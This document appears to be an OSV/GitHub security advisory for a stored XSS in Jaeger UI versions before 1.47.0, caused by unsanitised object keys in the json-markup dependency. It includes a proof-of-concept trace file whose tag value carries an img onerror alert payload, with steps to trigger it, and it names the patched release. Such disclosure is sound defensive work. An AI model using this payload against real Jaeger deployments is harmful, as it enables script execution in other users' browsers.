---
id: GHSA-2w8w-qhg4-f78j
title: >-
  A stored XSS in jaeger UI might allow an attacker who controls a trace to
  perform arbitrary jaeger queries
summary: >-
  A stored XSS in jaeger UI might allow an attacker who controls a trace to
  perform arbitrary jaeger queries
severity: medium
cvss: 6.5
cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'
vendor: jaegertracing
product: github.com/jaegertracing/jaeger
ecosystem: go
affected:
  - github.com/jaegertracing/jaeger < 1.47.0
patched:
  - github.com/jaegertracing/jaeger 1.47.0
published: '2023-07-11'
updated: '2026-09-10'
sourceUpdated: '2026-09-10T03:49:42.501224921Z'
source: OSV
sourceUrl: 'https://osv.dev/vulnerability/GHSA-2w8w-qhg4-f78j'
references:
  - url: >-
      https://github.com/jaegertracing/jaeger-ui/security/advisories/GHSA-vv24-rm95-q56r
  - url: >-
      https://github.com/jaegertracing/jaeger/security/advisories/GHSA-2w8w-qhg4-f78j
  - url: 'https://github.com/jaegertracing/jaeger'
  - url: >-
      https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49
tags:
  - osv
  - go
ingestedAt: '2026-09-12T03:13:01.746Z'
---

## Overview

Related UI vulnerability advisory: https://github.com/jaegertracing/jaeger-ui/security/advisories/GHSA-vv24-rm95-q56r

### Summary
Jaeger UI is using the `json-markup` dependency to display span attributes and resources. This dependency is not sanitising keys of an object though, thus the `KeyValuesTable` is vulnerable to XSS. 

### Details
The vulnerable line is here: https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49

### PoC

1. Start a Jaeger UI
2. Save the following trace as a file:
```json
{
    "data": [
        {
            "traceID": "076ef819cc06c45a",
            "spans": [
                {
                    "traceID": "076ef819cc06c45a",
                    "spanID": "076ef819cc06c45a",
                    "flags": 1,
                    "operationName": "and open 'attributes'",
                    "references": [],
                    "startTime": 1678196149232010,
                    "duration": 13485,
                    "tags": [
                        {
                            "key": "sampler.type",
                            "type": "string",
                            "value": "{\"<img src=x onerror=alert(1)>\":\"test\"}"
                        }
                    ],
                    "logs": [],
                    "processID": "p1",
                    "warnings": null
                }
            ],
            "processes": {
                "p1": {
                    "serviceName": "click here",
                    "tags": [
                    ]
                }
            },
            "warnings": null
        }
    ],
    "total": 0,
    "limit": 0,
    "offset": 0,
    "errors": null
}
```
3. Upload that trace to Jaeger UI in order to visualise it.
4. Open the trace, open it's span's attributes.
5. XSS should be fired.

### Impact

This is a XSS on Jaeger UI. XSS can be used to run JavaScript.


## Affected packages

- `github.com/jaegertracing/jaeger < 1.47.0`

## Remediation

Upgrade to a patched release:

- `github.com/jaegertracing/jaeger 1.47.0`
